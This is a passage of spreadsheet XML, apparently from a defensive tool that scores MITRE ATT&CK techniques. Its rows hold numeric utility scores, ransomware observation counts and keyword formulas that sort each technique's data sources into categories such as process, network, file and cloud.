      <c r="AA48" s="37">
        <v>0.06</v>
      </c>
      <c r="AB48" s="37">
        <v>0.06</v>
      </c>
      <c r="AC48" s="37"/>
      <c r="AD48" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE48" s="37" t="str" cm="1">
        <f t="array" ref="AE48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF48" s="37">
        <v>44</v>
      </c>
      <c r="AG48" s="37" t="str" cm="1">
        <f t="array" ref="AG48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH48" s="37">
        <v>44</v>
      </c>
      <c r="AI48" s="37" t="str" cm="1">
        <f t="array" ref="AI48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD48)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ48" s="37">
        <v>44</v>
      </c>
      <c r="AK48" s="37" t="str" cm="1">
        <f t="array" ref="AK48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL48" s="37">
        <v>44</v>
      </c>
      <c r="AM48" s="37" t="str" cm="1">
        <f t="array" ref="AM48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN48" s="37">
        <v>0</v>
      </c>
      <c r="AO48" s="37">
        <v>1</v>
      </c>
      <c r="AP48" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ48" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.5857142857142854</v>
      </c>
      <c r="AR48" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS48" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT48" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU4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0.20442176870748296</v>
      </c>
    </row>
    <row r="49" spans="1:47" ht="34">
      <c r="A49" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B49" s="37">
        <f t="shared" si="0"/>
        <v>18.961904761904762</v>
      </c>
      <c r="C49" s="37" t="s">
        <v>228</v>
      </c>
      <c r="D49" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E49" s="37" t="s">
        <v>229</v>
      </c>
      <c r="F49" s="37">
        <v>1</v>
      </c>
      <c r="G49" s="37">
        <v>1</v>
      </c>
      <c r="H49" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I49" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J49" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K49" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L49" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M49" s="37">
        <v>0</v>
      </c>
      <c r="N49" s="56">
        <v>0</v>
      </c>
      <c r="O49" s="56">
        <v>0</v>
      </c>
      <c r="P49" s="56">
        <v>1</v>
      </c>
      <c r="Q49" s="56">
        <v>0</v>
      </c>
      <c r="R49" s="57"/>
      <c r="S49" s="57">
        <v>0</v>
      </c>
      <c r="T49" s="57"/>
      <c r="U49" s="57">
        <v>0</v>
      </c>
      <c r="V49" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W49" s="37">
        <v>0</v>
      </c>
      <c r="X49" s="37">
        <v>0</v>
      </c>
      <c r="Y49" s="37">
        <v>0</v>
      </c>
      <c r="Z49" s="37">
        <v>1</v>
      </c>
      <c r="AA49" s="37">
        <v>0.01</v>
      </c>
      <c r="AB49" s="37">
        <v>0.01</v>
      </c>
      <c r="AC49" s="37"/>
      <c r="AD49" s="50" t="s">
        <v>230</v>
      </c>
      <c r="AE49" s="37" t="str" cm="1">
        <f t="array" ref="AE49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF49" s="37">
        <v>45</v>
      </c>
      <c r="AG49" s="37" t="str" cm="1">
        <f t="array" ref="AG49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH49" s="37">
        <v>45</v>
      </c>
      <c r="AI49" s="37" t="str" cm="1">
        <f t="array" ref="AI49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD49)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ49" s="37">
        <v>45</v>
      </c>
      <c r="AK49" s="37" t="str" cm="1">
        <f t="array" ref="AK49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL49" s="37">
        <v>45</v>
      </c>
      <c r="AM49" s="37" t="str" cm="1">
        <f t="array" ref="AM49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN49" s="37">
        <v>0</v>
      </c>
      <c r="AO49" s="37"/>
      <c r="AP49" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ49" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.3206349206349204</v>
      </c>
      <c r="AR49" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS49" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT49" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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0" spans="1:47" ht="34">
      <c r="A50" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B50" s="37">
        <f t="shared" si="0"/>
        <v>18.5</v>
      </c>
      <c r="C50" s="37" t="s">
        <v>231</v>
      </c>
      <c r="D50" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E50" s="37" t="s">
        <v>232</v>
      </c>
      <c r="F50" s="37">
        <v>1</v>
      </c>
      <c r="G50" s="37">
        <v>1</v>
      </c>
      <c r="H50" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I50" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J50" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K50" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L50" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M50" s="37">
        <v>0</v>
      </c>
      <c r="N50" s="56">
        <v>0</v>
      </c>
      <c r="O50" s="56">
        <v>0</v>
      </c>
      <c r="P50" s="56">
        <v>0</v>
      </c>
      <c r="Q50" s="56">
        <v>0</v>
      </c>
      <c r="R50" s="57"/>
      <c r="S50" s="57"/>
      <c r="T50" s="57"/>
      <c r="U50" s="57"/>
      <c r="V50" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W50" s="37">
        <v>0</v>
      </c>
      <c r="X50" s="37">
        <v>0</v>
      </c>
      <c r="Y50" s="37">
        <v>0</v>
      </c>
      <c r="Z50" s="37">
        <v>0</v>
      </c>
      <c r="AA50" s="37">
        <v>0</v>
      </c>
      <c r="AB50" s="37">
        <v>0</v>
      </c>
      <c r="AC50" s="37"/>
      <c r="AD50" s="50" t="s">
        <v>233</v>
      </c>
      <c r="AE50" s="37" t="str" cm="1">
        <f t="array" ref="AE50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD50)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF50" s="37">
        <v>46</v>
      </c>
      <c r="AG50" s="37" t="str" cm="1">
        <f t="array" ref="AG50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH50" s="37">
        <v>46</v>
      </c>
      <c r="AI50" s="37" t="str" cm="1">
        <f t="array" ref="AI50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD50)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ50" s="37">
        <v>46</v>
      </c>
      <c r="AK50" s="37" t="str" cm="1">
        <f t="array" ref="AK50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL50" s="37">
        <v>46</v>
      </c>
      <c r="AM50" s="37" t="str" cm="1">
        <f t="array" ref="AM50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN50" s="37">
        <v>0</v>
      </c>
      <c r="AO50" s="37"/>
      <c r="AP50" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ50" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.166666666666667</v>
      </c>
      <c r="AR50" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS50" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT50" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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1" spans="1:47" ht="34">
      <c r="A51" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B51" s="37">
        <f t="shared" si="0"/>
        <v>18.900000000000002</v>
      </c>
      <c r="C51" s="37" t="s">
        <v>234</v>
      </c>
      <c r="D51" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E51" s="37" t="s">
        <v>235</v>
      </c>
      <c r="F51" s="37">
        <v>1</v>
      </c>
      <c r="G51" s="37">
        <v>1</v>
      </c>
      <c r="H51" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I51" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J51" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K51" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L51" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M51" s="37">
        <v>0</v>
      </c>
      <c r="N51" s="56">
        <v>0</v>
      </c>
      <c r="O51" s="56">
        <v>0</v>
      </c>
      <c r="P51" s="56">
        <v>0</v>
      </c>
      <c r="Q51" s="56">
        <v>0</v>
      </c>
      <c r="R51" s="57"/>
      <c r="S51" s="57"/>
      <c r="T51" s="57"/>
      <c r="U51" s="57"/>
      <c r="V51" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W51" s="37">
        <v>0</v>
      </c>
      <c r="X51" s="37">
        <v>0</v>
      </c>
      <c r="Y51" s="37">
        <v>0</v>
      </c>
      <c r="Z51" s="37">
        <v>0</v>
      </c>
      <c r="AA51" s="37">
        <v>0</v>
      </c>
      <c r="AB51" s="37">
        <v>0</v>
      </c>
      <c r="AC51" s="37"/>
      <c r="AD51" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE51" s="37" t="str" cm="1">
        <f t="array" ref="AE51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF51" s="37">
        <v>47</v>
      </c>
      <c r="AG51" s="37" t="str" cm="1">
        <f t="array" ref="AG51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH51" s="37">
        <v>47</v>
      </c>
      <c r="AI51" s="37" t="str" cm="1">
        <f t="array" ref="AI51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD51)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ51" s="37">
        <v>47</v>
      </c>
      <c r="AK51" s="37" t="str" cm="1">
        <f t="array" ref="AK51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL51" s="37">
        <v>47</v>
      </c>
      <c r="AM51" s="37" t="str" cm="1">
        <f t="array" ref="AM51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN51" s="37">
        <v>0</v>
      </c>
      <c r="AO51" s="37"/>
      <c r="AP51" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ51" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.3000000000000007</v>
      </c>
      <c r="AR51" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS51" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT51" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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2" spans="1:47" ht="34">
      <c r="A52" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B52" s="37">
        <f t="shared" si="0"/>
        <v>19.3</v>
      </c>
      <c r="C52" s="37" t="s">
        <v>236</v>
      </c>
      <c r="D52" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E52" s="37" t="s">
        <v>237</v>
      </c>
      <c r="F52" s="37">
        <v>1</v>
      </c>
      <c r="G52" s="37">
        <v>1</v>
      </c>
      <c r="H52" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I52" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J52" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K52" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L52" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M52" s="37">
        <v>0</v>
      </c>
      <c r="N52" s="56">
        <v>0</v>
      </c>
      <c r="O52" s="56">
        <v>0</v>
      </c>
      <c r="P52" s="56">
        <v>0</v>
      </c>
      <c r="Q52" s="56">
        <v>0</v>
      </c>
      <c r="R52" s="57"/>
      <c r="S52" s="57"/>
      <c r="T52" s="57"/>
      <c r="U52" s="57"/>
      <c r="V52" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W52" s="37">
        <v>0</v>
      </c>
      <c r="X52" s="37">
        <v>0</v>
      </c>
      <c r="Y52" s="37">
        <v>0</v>
      </c>
      <c r="Z52" s="37">
        <v>0</v>
      </c>
      <c r="AA52" s="37">
        <v>0</v>
      </c>
      <c r="AB52" s="37">
        <v>0</v>
      </c>
      <c r="AC52" s="37"/>
      <c r="AD52" s="50" t="s">
        <v>238</v>
      </c>
      <c r="AE52" s="37" t="str" cm="1">
        <f t="array" ref="AE52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF52" s="37">
        <v>48</v>
      </c>
      <c r="AG52" s="37" t="str" cm="1">
        <f t="array" ref="AG52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH52" s="37">
        <v>48</v>
      </c>
      <c r="AI52" s="37" t="str" cm="1">
        <f t="array" ref="AI52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD52)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ52" s="37">
        <v>48</v>
      </c>
      <c r="AK52" s="37" t="str" cm="1">
        <f t="array" ref="AK52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL52" s="37">
        <v>48</v>
      </c>
      <c r="AM52" s="37" t="str" cm="1">
        <f t="array" ref="AM52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN52" s="37">
        <v>0</v>
      </c>
      <c r="AO52" s="37"/>
      <c r="AP52" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ52" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.4333333333333336</v>
      </c>
      <c r="AR52" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS52" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT52" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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3" spans="1:47" ht="34">
      <c r="A53" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B53" s="37">
        <f t="shared" si="0"/>
        <v>19.700000000000003</v>
      </c>
      <c r="C53" s="37" t="s">
        <v>3772</v>
      </c>
      <c r="D53" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E53" s="37" t="s">
        <v>3773</v>
      </c>
      <c r="F53" s="37">
        <v>1</v>
      </c>
      <c r="G53" s="37">
        <v>1</v>
      </c>
      <c r="H53" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I53" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J53" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K53" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L53" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M53" s="37">
        <v>0</v>
      </c>
      <c r="N53" s="56">
        <v>0</v>
      </c>
      <c r="O53" s="56">
        <v>0</v>
      </c>
      <c r="P53" s="56">
        <v>0</v>
      </c>
      <c r="Q53" s="56">
        <v>0</v>
      </c>
      <c r="R53" s="57"/>
      <c r="S53" s="57"/>
      <c r="T53" s="57"/>
      <c r="U53" s="57"/>
      <c r="V53" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W53" s="37"/>
      <c r="X53" s="37"/>
      <c r="Y53" s="37"/>
      <c r="Z53" s="37"/>
      <c r="AA53" s="37"/>
      <c r="AB53" s="37"/>
      <c r="AC53" s="37"/>
      <c r="AD53" s="50" t="s">
        <v>3774</v>
      </c>
      <c r="AE53" s="37" t="str" cm="1">
        <f t="array" ref="AE53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD53)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF53" s="37">
        <v>49</v>
      </c>
      <c r="AG53" s="37" t="str" cm="1">
        <f t="array" ref="AG53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH53" s="37">
        <v>49</v>
      </c>
      <c r="AI53" s="37" t="str" cm="1">
        <f t="array" ref="AI53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD53)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ53" s="37">
        <v>49</v>
      </c>
      <c r="AK53" s="37" t="str" cm="1">
        <f t="array" ref="AK53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL53" s="37">
        <v>49</v>
      </c>
      <c r="AM53" s="37" t="str" cm="1">
        <f t="array" ref="AM53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN53" s="37"/>
      <c r="AO53" s="37"/>
      <c r="AP53" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ53" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.5666666666666673</v>
      </c>
      <c r="AR53" s="37">
